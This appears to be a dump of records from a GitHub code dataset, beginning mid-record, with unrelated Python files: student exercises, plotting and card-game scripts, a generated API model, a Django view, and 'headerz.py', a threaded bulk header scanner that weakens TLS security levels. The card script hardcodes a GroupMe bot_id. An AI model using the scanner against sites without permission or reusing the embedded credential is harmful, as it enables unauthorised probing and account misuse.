Example `python3 server.py -p 8080 -d 0`\")\n sys.exit(1)\n\nserver_port = -1\ndelay = 0\nidx = 1\n\nwhile idx int:\n return sum(l)\n\ndef digitsOfInt(n: int) -> List[int]:\n if n <= 0:\n return []\n else:\n digits = []\n while n > 0:\n digits.append(n % 10)\n n //= 10\n return digits[::-1]\n \ndef additivePersistence(n: int) -> int:\n if n < 10:\n return 0\n else:\n persistence = 0\n while n >= 10:\n n = sum(int(d) for d in str(n))\n persistence += 1\n return persistence\n\ndef digitalRoot(n: int) -> int:\n if n < 10:\n return n\n else:\n while n >= 10:\n n = sum(int(d) for d in str(n))\n return n\n\ndef listReverse(lst):\n reversed_lst = []\n for i in range(len(lst) - 1, -1, -1):\n reversed_lst.append(lst[i])\n return reversed_lst\n\n# Problem #1 A)\n# Example usage for sumList\nlist1 = [1, 2, 3, 4]\nlist2 = [1,-2,3,5]\nlist3 = [1,3,5,7,9,11]\n\nprint(f\"The sum of {list1} is {sumList(list1)}\")\nprint(f\"The sum of {list2} is {sumList(list2)}\")\nprint(f\"The sum of {list3} is {sumList(list3)}\")\n\n# Problem #1 B)\n# Example usage for digitsOfInt\nnum1 = 12345\nnum2 = 987654321\nnum3 = 0\nnum4 = -123\n\nprint(f\"The digits of {num1} are {digitsOfInt(num1)}\")\nprint(f\"The digits of {num2} are {digitsOfInt(num2)}\")\nprint(f\"The digits of {num3} are {digitsOfInt(num3)}\")\nprint(f\"The digits of {num4} are {digitsOfInt(num4)}\")\n\n# Problem #1 C)\n# Example usage for digitsOfInt\nn = 9876\npersistence = additivePersistence(n)\nroot = digitalRoot(n)\nprint(f\"The additive persistence of {n} is {persistence}\")\nprint(f\"The digital root of {n} is {root}\")\n\n# Problem #2 A)\n# Example usage for listReverse\nlst = [1, 2, 3, 4, 5]\nreversed_lst = listReverse(lst)\nprint(f\"The reversed list of {lst} is {reversed_lst}\")\n\ndef palindrome(w):\n # Convert the string to a list of characters\n chars = list(w)\n # Reverse the list of characters\n reversed_chars = listReverse(chars)\n # Convert the reversed list back to a string\n reversed_w = \"\".join(reversed_chars)\n # Compare the original string with the reversed string\n return w == reversed_w\n\n\nword1 = \"racecar\"\nword2 = \"hello\"\nprint(f\"{word1} is a palindrome: {palindrome(word1)}\")\nprint(f\"{word2} is a palindrome: {palindrome(word2)}\")\n\n#assignment 2\n# problem A, Tail recursion\n\ndef assoc(d, k, l):\n def helper(l, acc):\n if not l:\n return d\n elif l[0][0] == k:\n return l[0][1]\n else:\n return helper(l[1:], acc)\n return helper(l, d)\n\n# Example usage of the assoc function\nkey = \"jeff\"\ndefault_val = -1\nkey_val_pairs = [(\"sorin\", 85), (\"jeff\", 23), (\"moose\", 44)]\n\nresult = assoc(default_val, key, key_val_pairs)\nprint(\"Result of Assoc: \", result)\n\n# Question B: Define the remove_duplicates function\ndef remove_duplicates(lst):\n res = []\n for item in lst:\n if not res.__contains__(item):\n res.append(item)\n return res[::-1]\n\n# Example usage of the remove_duplicates function\ninput_list = [1, 6, 2, 4, 12, 2, 13, 6, 9]\nunique_list = remove_duplicates(input_list)\nprint(\"Result of remove duplicates: \",unique_list) # Output: [1, 6, 2, 4, 12, 13, 9]\n\n# Quesiton C: \ndef f(x):\n xx = x * x * x\n return (xx, xx < 100)\n\ndef wwhile(f_and_test, b):\n (f, test) = f_and_test\n (b_new, c) = f(b)\n if c:\n return wwhile((f, test), b_new)\n else:\n return b\n\nresult = wwhile((f, lambda x: True), 2)\nprint(\"Result of wwhile: \",result) # Output: 512\n\n# import matplotlib.pyplot as plt\n# Partition = 'Holidays', 'Eating_Out', 'Shopping', 'Groceries'\n# sizes = [250, 100, 300, 200]\n# fig1, ax1 = 
plt.subplots()\n# ax1.pie(sizes, labels=Partition, autopct='%1.1f%%', shadow=True, startangle=90) \n# ax1.axis('equal')\n# plt.show()\n\nimport tkinter\n#try Tinker\n# from tkinter import *\n# main = Tk()\n# main.mainloop()","repo_name":"parkem/Python-education","sub_path":"MP_learn/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27355727041","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_csv('salary.csv')\r\n\r\nyears = df.Year.to_list()\r\nteacher_salary = df.Teacher.to_list()\r\nadviser_salary = df.Adviser.to_list()\r\nprogrammer_salary = df.Programmer.to_list()\r\n\r\n\r\nplt.plot(years, teacher_salary, 'k--o', label='Teacher salary')\r\nplt.plot(years, adviser_salary, 'b.-.', label='Advisor salary')\r\nplt.plot(years, programmer_salary, 'y-s', label='Programmer salary')\r\n\r\nplt.tight_layout()\r\nplt.grid(True)\r\nplt.legend()\r\nplt.title(\"Mean salaries charts\")\r\nplt.xlabel('Year')\r\nplt.ylabel('Salary')\r\n\r\nplt.show()","repo_name":"Logicode-git/matplotlib_logicode","sub_path":"plt_salary.py","file_name":"plt_salary.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73058889371","text":"# Define a function that takes a list of cards and a player, and sends them the batch of cards\ndef send_cards(cards, player):\n # Send the batch of cards to the player\n # Replace this with your code for sending the cards\n print(f\"Sending {cards} to {player}\")\n\n# Define a list of players\nplayers = ['player1', 'player2', 'player3']\n\n# Define a list of cards\ncards = ['card1', 'card2', 'card3', 'card4', 'card5', 'card6', 'card7', 'card8', 'card9', 'card10', 'card11', 'card12', 'card13', 'card14', 'card15']\n\n# Iterate through the list of players, and send them a batch of 10 cards\nfor player in players:\n # Get the next batch of 10 cards\n batch = cards[:10]\n\n # Send the batch of cards to the player\n send_cards(batch, player)\n\n # Remove the sent cards from the list\n cards = cards[10:]\n\n\n# Define a function that takes a player, and asks them to select their five cards\ndef select_cards(player):\n # Ask the player to select their five cards\n # Replace this with your code for asking the player to select their cards\n selected_cards = ['card1', 'card2', 'card3', 'card4', 'card5']\n\n # Return the selected cards\n return selected_cards\n\n# Define a list of players\nplayers = ['player1', 'player2', 'player3']\n\n# Create an empty list to store the selected cards\nselected_cards = []\n\n# Iterate through the list of players, and ask them to select their five cards\nfor player in players:\n # Ask the player to select their five cards\n player_selected_cards = select_cards(player)\n\n# Add the player's selected cards to the list of selected cards\nselected_cards += player_selected_cards\n\n# Print the list of selected cards\nprint(selected_cards)\n\n\n\n\nimport requests\n\n# Replace :bot_id with your bot's ID\nbot_id = \"c9d6f93a4e96eeadbeaf21feef\"\n\n# Set the base URL for the GroupMe API\nbase_url = \"https://api.groupme.com/v3\"\n\n# Set the payload for the request to the GroupMe API\n# This payload will send a message to the group with the list of cards\npayload = {\n \"bot_id\": bot_id,\n \"text\": \"Here are your cards: [Card 1, Card 2, Card 3, Card 4, Card 5, Card 6, Card 7, Card 8, Card 9, 
Card 10]\"\n}\n\n# Make the POST request to the GroupMe API to send the message\nresponse = requests.post(f\"{base_url}/bots/post\", json=payload)\n\n# Check the status code of the response\nif response.status_code != 202:\n print(f\"Failed to send message: {response.status_code} {response.text}\")\nelse:\n print(\"Message sent successfully.\")\n\n\n\n########################\n\n\nimport textwrap\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef generate_card(title, definition, points):\n # determine the font size based on the length of the definition\n font_size = int(len(definition) / 20)\n if font_size < 10:\n font_size = 10\n elif font_size > 20:\n font_size = 20\n\n # create the image and draw objects\n image = Image.new('RGB', (400, 300), (255, 255, 255))\n draw = ImageDraw.Draw(image)\n\n # select a font and draw the title in a rectangle\n font = ImageFont.truetype('arial.ttf', size=font_size)\n draw.rectangle([(10, 10), (390, 50)], fill='lightgrey')\n draw.text((20, 20), title, font=font, fill=(0, 0, 0))\n\n # draw the definition in a rectangle\n draw.rectangle([(10, 60), (390, 250)], fill='lightgrey')\n draw.text((20, 70), definition, font=font, fill=(0, 0, 0))\n\n # draw a circle around the point value\n draw.ellipse([(360, 270), (390, 300)], fill='lightgrey')\n draw.text((365, 275), str(points), font=font, fill=(0, 0, 0))\n\n # save the image\n image.save('card.png')\n\n\ndef create_card(title, definition, point_value, card_width, card_height):\n # code to create the card\n # wrap the title text\n wrapped_title = textwrap.wrap(title, width=card_width)\n # wrap the definition text\n wrapped_definition = textwrap.wrap(definition, width=card_width)\n\n\ndef create_card(title, definition, point_value, card_width, card_height):\n # code to create the card\n # add some padding to the card\n padding = 10\n # draw a rectangle around the title\n draw.rectangle([(padding, padding), (card_width-padding, padding+font_size)], fill=(255, 255, 255))\n # draw a rectangle around the definition\n draw.rectangle([(padding, padding+font_size), (card_width-padding, card_height-padding)], fill=(255, 255, 255))\n # draw a circle around the point value\n draw.ellipse([(card_width-padding-font_size, card_height-padding-font_size), (card_width-padding, card_height-padding)], fill=(255, 255, 255))\n","repo_name":"grahamwaters/Mimikers","sub_path":"storage_bin/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9975195785","text":"# coding: utf-8\n\n\"\"\"\n metal-api\n\n API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501\n\n OpenAPI spec version: v0.25.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass HttperrorsHTTPErrorResponse(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'message': 'str',\n 'statuscode': 'int'\n }\n\n attribute_map = {\n 'message': 'message',\n 'statuscode': 'statuscode'\n }\n\n def __init__(self, message=None, statuscode=None): # noqa: 
E501\n \"\"\"HttperrorsHTTPErrorResponse - a model defined in Swagger\"\"\" # noqa: E501\n\n self._message = None\n self._statuscode = None\n self.discriminator = None\n\n self.message = message\n self.statuscode = statuscode\n\n @property\n def message(self):\n \"\"\"Gets the message of this HttperrorsHTTPErrorResponse. # noqa: E501\n\n error message # noqa: E501\n\n :return: The message of this HttperrorsHTTPErrorResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._message\n\n @message.setter\n def message(self, message):\n \"\"\"Sets the message of this HttperrorsHTTPErrorResponse.\n\n error message # noqa: E501\n\n :param message: The message of this HttperrorsHTTPErrorResponse. # noqa: E501\n :type: str\n \"\"\"\n if message is None:\n raise ValueError(\"Invalid value for `message`, must not be `None`\") # noqa: E501\n\n self._message = message\n\n @property\n def statuscode(self):\n \"\"\"Gets the statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n\n http status code # noqa: E501\n\n :return: The statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._statuscode\n\n @statuscode.setter\n def statuscode(self, statuscode):\n \"\"\"Sets the statuscode of this HttperrorsHTTPErrorResponse.\n\n http status code # noqa: E501\n\n :param statuscode: The statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n :type: int\n \"\"\"\n if statuscode is None:\n raise ValueError(\"Invalid value for `statuscode`, must not be `None`\") # noqa: E501\n\n self._statuscode = statuscode\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(HttperrorsHTTPErrorResponse, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, HttperrorsHTTPErrorResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"metal-stack/metal-python","sub_path":"metal_python/models/httperrors_http_error_response.py","file_name":"httperrors_http_error_response.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"8690424977","text":"s1= ['Ahmad', 18, 17, 19.5, 8, 25]\ns2= ['Sami', 20, 20, 19, 9, 28]\ns3= ['Faris', 14.5, 16, 13, 7, 23]\nlist1=[s1[0],s2[0],s3[0]]\nsum=0\nstudentName=str(input(\"Enter student's name\"))\nif (studentName in list1):\n if (studentName in s1):\n for i in range(1,len(s1)):\n sum=sum+s1[i]\n print(sum)\n elif studentName in s2:\n for i in range(1,len(s2)):\n sum=sum+s2[i]\n print(sum)\n elif studentName in s3:\n for i in range(1,len(s3)):\n 
sum=sum+s3[i]\n            print(sum)\nelse:\n    print(\"Student is not recorded\")\n","repo_name":"AhlamIzzeldeen/Facoders","sub_path":"Week4-2.py","file_name":"Week4-2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"37654155408","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom .forms import ContactForm\nfrom django.urls import reverse_lazy\nimport time\nfrom blog.models import Category\n\ndef contact(request):\n    if request.method == 'POST':\n        form = ContactForm(request.POST)\n        if form.is_valid():\n            name = form.cleaned_data.get('name')\n            email = form.cleaned_data['email']\n            content = form.cleaned_data['content']\n            \n            pos_arroba = email.find('@')\n            dominio = email[pos_arroba+1:]\n            \n            if dominio != \"gmail.com\":\n                form.add_error('email','dominio invalido')\n                return render(request,'contact/contact.html',{'form':form})\n            #print(form.cleaned_data.get('name'))\n            #print(form.cleaned_data['email'])\n            #return HttpResponseRedirect('/contact/thanks/')\n            \n            return HttpResponseRedirect(reverse_lazy('contact:thanks'))\n    else: \n        form = ContactForm()\n    return render(request, 'contact/contact.html',{'form':form})\n    \ndef thanks(request):\n    return render(request, 'contact/thanks.html')\n\n# AJAX practice\ndef ejecutaAJAX(request):\n    if request.method == 'POST':\n        # Field validation\n        categorias = Category.objects.all()\n        opcion = request.POST.get('valor','')\n        respuesta = {}\n        opciones = {}\n        if opcion == '1':\n            respuesta['estado'] = 'correcto'\n            for categoria in categorias:\n                opciones[categoria.id] = categoria.name\n            #opciones['1'] = 'Opcion1'\n            #opciones['2'] = 'Opcion2'\n            #opciones['3'] = 'Opcion3'\n            #opciones['4'] = 'Opcion4'\n            #opciones['5'] = 'Opcion5'\n        elif opcion == '2':\n            respuesta['estado'] = 'correcto'\n            opciones['1'] = '2 - Opcion1'\n            opciones['2'] = '2 - Opcion2'\n            opciones['3'] = '2 - Opcion3'\n        else:\n            respuesta['estado'] = 'No valido'\n        \n        respuesta['opciones'] = opciones\n        time.sleep(5)\n        return JsonResponse(respuesta)\n    \n\n# Create your views here.\n","repo_name":"wariormex/DjangoRestaurante","sub_path":"Proyecto/webRestaurante/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"20274969067","text":"#!/usr/bin/python3\n\"\"\"Defines 'Square' subclass.\"\"\"\nfrom models import rectangle\n\n\nclass Square(rectangle.Rectangle):\n    \"\"\"Initializes Square objects with attributes.\n\n    It defines mandatory @size and optional @x & @y coordinates upon object\n    instantiation and defines instance methods to get and set them\n    \"\"\"\n\n    def __init__(self, size, x=0, y=0, id=None):\n        \"\"\"Define attributes for square object.\n\n        Args:\n            self (object): Refers to object instantiated\n            size (int): Size of Square\n            x (int, optional): Horizontal measurement\n            y (int, optional): Vertical measurement\n\n        Returns:\n            None\n        \"\"\"\n        super().__init__(size, size, x, y, id)\n        return None\n\n    @property\n    def size(self):\n        \"\"\"Return size of square.\n\n        Args:\n            self (object): Refers to object instantiated\n\n        Returns:\n            The private attribute 'size'\n        \"\"\"\n        return super().width\n\n    @size.setter\n    def size(self, value):\n        \"\"\"Sets the @width and @height attribs to @value\n\n        Args:\n            self (object): Refers to object instantiated\n            value (int): value to set @width & @height\n\n        Returns:\n            None\n        \"\"\"\n
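        # a square keeps width and height equal, so one value sets both\n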
        self.width = value\n        self.height = value\n        return None\n\n    def __str__(self):\n        \"\"\"Display object representing string.\n\n        Args:\n            self (object): Refers to object instantiated\n\n        Returns:\n            String representation of square object\n        \"\"\"\n        string = \"[Square] ({}) {}/{}\".format(self.id, self.x, self.y)\n        string += \" - {}\".format(self.size)\n        return string\n\n    def update(self, *args, **kwargs):\n        \"\"\"Update attributes of Square object.\n\n        Args:\n            First element of @args is 'id'\n            Second element of @args is 'size'\n            Third element of @args is 'x'\n            Fourth element of @args is 'y'\n\n        Returns:\n            None\n        \"\"\"\n        arg_position = 0\n        if len(args) != 0:\n            for elem in args:\n                if arg_position == 0:\n                    self.id = elem\n                elif arg_position == 1:\n                    self.size = elem\n                elif arg_position == 2:\n                    self.x = elem\n                elif arg_position == 3:\n                    self.y = elem\n                arg_position = arg_position + 1\n        else:\n            for k, v in kwargs.items():\n                if k == \"id\":\n                    self.id = v\n                elif k == \"size\":\n                    self.size = v\n                elif k == \"x\":\n                    self.x = v\n                elif k == \"y\":\n                    self.y = v\n        return None\n\n    def to_dictionary(self):\n        \"\"\"Converts object to dictionary object.\n\n        Args:\n            self (object): Refers to object instantiated\n\n        Returns:\n            Dictionary representation of 'Square' object.\n        \"\"\"\n        return {\n            \"id\": self.id,\n            \"size\": self.size,\n            \"x\": self.x,\n            \"y\": self.y\n        }\n\n    pass\n","repo_name":"leykun-gizaw/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"14609164820","text":"#!/bin/python3\n#Author: avacadoPWN (Kovan MohammedAmeen)\n#License: MIT\n\nfrom time import sleep, time\nimport json\nimport queue\nimport ssl\nimport threading\nimport requests\nimport sys\nimport datetime\nimport os\nfrom urllib3 import poolmanager\nfrom concurrent.futures import ThreadPoolExecutor\nfrom rich import print\nt = datetime.datetime\n\n\nif len(sys.argv) >= 2 and len(sys.argv) < 4:\n    if len(sys.argv) == 2:\n        args = {\n            'urls_list': sys.argv[1],\n            'json_export': None}\n    else:\n        args = {\n            'urls_list': sys.argv[1],\n            'json_export': sys.argv[2]}\nelse:\n    print(\"Usage:\\n\\n\" +\n          \"./headerz.py url_list stats_file(ndjson)\\n\")\n    exit(-1)\n\nprint(\"\\nNumber of Threads (default 65): \", end='')\nnum_of_threads = input()\nif num_of_threads == '':\n    num_of_threads = 65\nelif not num_of_threads.isnumeric():\n    print(\"[red]Error[/red], Thread amount must be in numeric value (0-250)\\nTry again.\")\n    exit(-1)\nelse:\n    num_of_threads = int(num_of_threads)\n\n\nif args['json_export']:\n    stats_file = args['json_export']\nelse:\n    stats_file = args['urls_list'] + \" - \" + \\\n        t.now().strftime(\"%Y-%m-%d_%H-%M-%S\") + \".ndjson\"\n\nresults_directory = os.getcwd()\n\nexport_file = open(os.path.join(results_directory, stats_file), \"a+\")\n\n\ntry:\n    urls = open(args['urls_list'], \"r\").read().splitlines()\n\nexcept FileNotFoundError:\n    print(\"\\nError, URL list:\", \"'\"+args['urls_list']+\"'\", \"not found!\")\n    exit(-1)\n\n\nq = queue.Queue()\nfor url in urls:\n    q.put(url)\n\n\nclass EmptyURL(Exception):\n    pass\n\n\nclass TLSAdapter(requests.adapters.HTTPAdapter):\n\n    def init_poolmanager(self, connections, maxsize, block=False):\n        ctx = ssl.create_default_context()\n        ctx.set_ciphers('DEFAULT@SECLEVEL=1')\n        self.poolmanager = poolmanager.PoolManager(\n            num_pools=connections,\n            maxsize=maxsize,\n
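            # the relaxed cipher context above lets older TLS servers complete the handshake\n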
block=block,\n ssl_version=ssl.PROTOCOL_TLS,\n ssl_context=ctx)\n\n\nthread_local = threading.local()\n\n\ndef get_session():\n if not hasattr(thread_local, \"session\"):\n thread_local.session = requests.Session()\n thread_local.session.mount('https://', TLSAdapter())\n return thread_local.session\n\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'}\n\n\ndef check(url):\n if url == '':\n print('empty url')\n raise EmptyURL\n session = get_session()\n\n try:\n if 'http' not in url:\n url = \"https://\"+url+\"/\"\n\n response = session.head(url, headers=header, timeout=10)\n add_to_dict(response.headers, url, response.url)\n stats['passed'] += 1\n except requests.exceptions.SSLError:\n stats['ssl_error'] += 1\n\n except EmptyURL:\n stats['num_of_requests'] += -1\n pass\n except Exception:\n stats['error'] += 1\n\n finally:\n stats['num_of_requests'] += 1\n print(stats['num_of_requests'], '/', stats['num_of_urls'], end='\\r')\n\n\nstats = {\n 'num_of_requests': 0,\n 'passed': 0,\n 'ssl_error': 0,\n 'error': 0,\n 'num_of_urls': len(urls)\n}\n\n\ncollected_data = {}\n\n\ndef add_to_dict(header, url, dest_url):\n collected_data[url] = {'url': dest_url, \"headers\": dict(header)}\n\n\ncounter = 0\n\n\ndef export_ndjson(data):\n global counter\n print('\\nexporting the collected headers to NDJSON')\n for item in data:\n new_item = {}\n new_item['domain'] = item\n new_item['url'] = data[item]['url']\n new_item['headers'] = data[item]['headers']\n export_file.write(json.dumps(new_item))\n export_file.write('\\n')\n counter += 1\n print(\"progress: {:d} /{:d}\".format(counter, size), end='\\r')\n\n\ndef main():\n with ThreadPoolExecutor(max_workers=num_of_threads) as executor:\n try:\n executor.map(check, [q.get() for x in range(q.qsize())])\n finally:\n executor.shutdown(wait=True)\n\n\nt1 = time()\nprint('Fetching {} URLs...'.format(len(urls)))\nmain()\nprint()\nprint(stats)\nsize = len(collected_data)\nexport_ndjson(collected_data)\nprint(\"\\n[green]All done.[/green]\")\nprint(\"Time Elapsed: {:.2f} S\\n\".format(time()-t1))\n","repo_name":"avacadoPWN/headerz","sub_path":"headerz.py","file_name":"headerz.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37836677108","text":"# -*- coding: utf-8 -*-\n\"\"\"\nKent-CAS: Camera Acquisition System\n\nThreading class for image processing of fibre bundle inline holography images. This\ninherits from ImageProcessorThread which contains core functionality. 
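Each raw frame is core-filtered through PyBundle and, when refocusing is enabled, numerically refocused with PyHoloscope.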
\n\n@author: Mike Hughes\nApplied Optics Group\nUniversity of Kent\n\n\"\"\"\n\nimport sys\nimport logging\n\nimport numpy as np\nimport time\n\nfrom ImageProcessorThread import ImageProcessorThread\nimport pybundle\nfrom pybundle import PyBundle\nimport pyholoscope\n\n\nimport matplotlib.pyplot as plt\n\nclass InlineBundleProcessor(ImageProcessorThread):\n \n method = None\n mask = None\n crop = None\n filterSize = None\n calibration = None\n refocus = False\n pyb = None\n preProcessFrame = None\n autoFocusFlag = False\n srCalibrateFlag = False\n invert = False\n showPhase = False\n sr = False\n batchProcessNum = 1\n \n def __init__(self, inBufferSize, outBufferSize, **kwargs):\n \n super().__init__(inBufferSize, outBufferSize, **kwargs)\n self.pyb = PyBundle()\n self.holo = pyholoscope.Holo(pyholoscope.INLINE_MODE, 1, 1)\n \n \n def process_frame(self, inputFrame):\n \"\"\" This is called by the thread whenever a frame needs to be processed\"\"\"\n \n if self.sr == True:\n # Check we have a list of images, otherwise return None\n\n if not inputFrame.ndim > 2:\n print(\"SR but no list of images\")\n return None\n \n \n \n # fig, axs = plt.subplots(2, 4, dpi=150)\n # fig.suptitle('Raw', fontsize=16)\n # axs[0,0].imshow(inputFrame[:,:,0])\n # axs[0,1].imshow(inputFrame[:,:,1])\n # axs[0,2].imshow(inputFrame[:,:,2])\n # axs[0,3].imshow(inputFrame[:,:,3])\n # axs[1,0].imshow(inputFrame[:,:,4])\n # axs[1,1].imshow(inputFrame[:,:,5])\n # axs[1,2].imshow(inputFrame[:,:,6])\n # axs[1,3].imshow(inputFrame[:,:,7])\n\n\n imgs = pybundle.SuperRes.sort_sr_stack(inputFrame, self.batchProcessNum - 1) \n \n # fig, axs = plt.subplots(2, 4, dpi=150)\n # fig.suptitle('Sorted', fontsize=16)\n # axs[0,0].imshow(imgs[:,:,0])\n # axs[0,1].imshow(imgs[:,:,1])\n # axs[0,2].imshow(imgs[:,:,2])\n # axs[0,3].imshow(imgs[:,:,3])\n # axs[1,0].imshow(imgs[:,:,4])\n # axs[1,1].imshow(imgs[:,:,5])\n # axs[1,2].imshow(imgs[:,:,6])\n\n\n \n if False:\n fig, axs = plt.subplots(2, 2)\n plt.title(\"After Sort\")\n axs[0,0].imshow(imgs[:,:,0])\n axs[0,1].imshow(imgs[:,:,1])\n axs[1,0].imshow(imgs[:,:,2])\n axs[1,1].imshow(imgs[:,:,3])\n \n #print(\"num images reconing with \", np.shape(imgs) )\n \n if imgs is not None:\n outputFrame = self.pyb.process(imgs) \n self.preProcessFrame = outputFrame\n \n \n else: # Not Superresolution\n \n # In case we have a list of images instead of an image \n #if inputFrame.__class__ == list:\n # inputFrame = inputFrame[0]\n if inputFrame.ndim == 3:\n inputFrame = inputFrame[:,:,0]\n outputFrame = self.pyb.process(inputFrame)\n \n self.preProcessFrame = outputFrame\n \n if self.refocus == True and outputFrame is not None:\n outputFrame = self.holo.process(outputFrame)\n if self.showPhase is False:\n outputFrame = np.abs(outputFrame)\n if self.invert is True:\n outputFrame = np.max(outputFrame) - outputFrame\n else:\n outputFrame = np.angle(outputFrame) \n if outputFrame is not None:\n outputFrame = np.abs(outputFrame) # Take intensity from complex image\n \n \n return outputFrame\n\n\n\n def handle_flags(self):\n \"\"\" Flags can be set externally for actions which cannot be performed\n until one or more images are available. 
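Autofocus, for example, needs a processed frame, and SR calibration needs a full batch of frames in the input queue. 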
Flags are checked every time we process a new image \n \"\"\"\n \n # AUTOFOCUS\n if self.autoFocusFlag:\n self.autoFocusFlag = False\n t1 = time.perf_counter()\n \n \n # SUPER RESOLUTION CALIBRATION \n if self.srCalibrateFlag:\n if self.get_num_images_in_input_queue() >= self.batchProcessNum:\n self.calibrate_sr()\n # Remove flag\n self.srCalibrateFlag = False\n \n def calibrate_sr(self):\n \n #if len(self.currentInputImage) >= self.batchProcessNum:\n \n # Convert list of images to 3D numpy array\n #img = self.currentInputImage[0]\n #imgs = np.zeros((np.shape(img)[0], np.shape(img)[1], self.batchProcessNum))\n #imgs[:,:,0] = img\n \n #for idx, img in enumerate(self.currentInputImage):\n # imgs[:,:,idx] = self.currentInputImage[idx]\n \n # Extract a sequence of frames in correct order following blank reference frame\n calibImgs = pybundle.SuperRes.sort_sr_stack(self.currentInputImage, self.batchProcessNum - 1) \n \n # SR Calibration\n self.pyb.set_sr_calib_images(calibImgs)\n self.pyb.calibrate_sr()\n \n #def acquire_sr_backgrounds(self):\n # backImgs = pybundle.SuperRes.sort_sr_stack(self.currentInputImage, self.batchProcessNum - 1) \n \n # self.pyb.set_sr_backgrounds(backImgs)\n \n \n def auto_focus(self, **kwargs):\n \n if self.preProcessFrame is not None:\n return self.holo.auto_focus(self.preProcessFrame.astype('float32'), **kwargs)\n \n \n def update_settings(self):\n \"\"\" For compatibility with multi-processor version\"\"\"\n pass","repo_name":"MikeHughesKent/holobundle","sub_path":"src/processors/InlineBundleProcessor.py","file_name":"InlineBundleProcessor.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40642115865","text":"#!/usr/bin/env python\n# coding:utf-8\n'''\nCreated on 2014-11-24\n@author: zhaohf\n'''\nfrom sklearn import svm\nfrom numpy import genfromtxt, savetxt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\ndef main():\n dataset = pd.read_csv(\"train.csv\").values[1:]\n test = pd.read_csv(\"test.csv\").values[1:]\n scaler = StandardScaler().fit(test)\n test = scaler.transform(test)\n target = [x[0] for x in dataset]\n train = [x[1:] for x in dataset]\n scaler = StandardScaler().fit(train)\n train = scaler.transform(train)\n svc = svm.SVC(probability=True)\n svc.fit(train, target)\n predicted_probs = [[index+1,x[1]] for index,x in enumerate(svc.predict_proba(test))]\n savetxt('svm_benchmark.csv',predicted_probs,delimiter=',',fmt='%d,%f',header='MoleculeId,PredictedProbability',comments='')\n\nif __name__ == '__main__':\n main()","repo_name":"dugzzuli/kaggleDemo","sub_path":"分子反映分类/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40632956319","text":"# Write a program where the user types in any expression that uses\r\n# parentheses. 
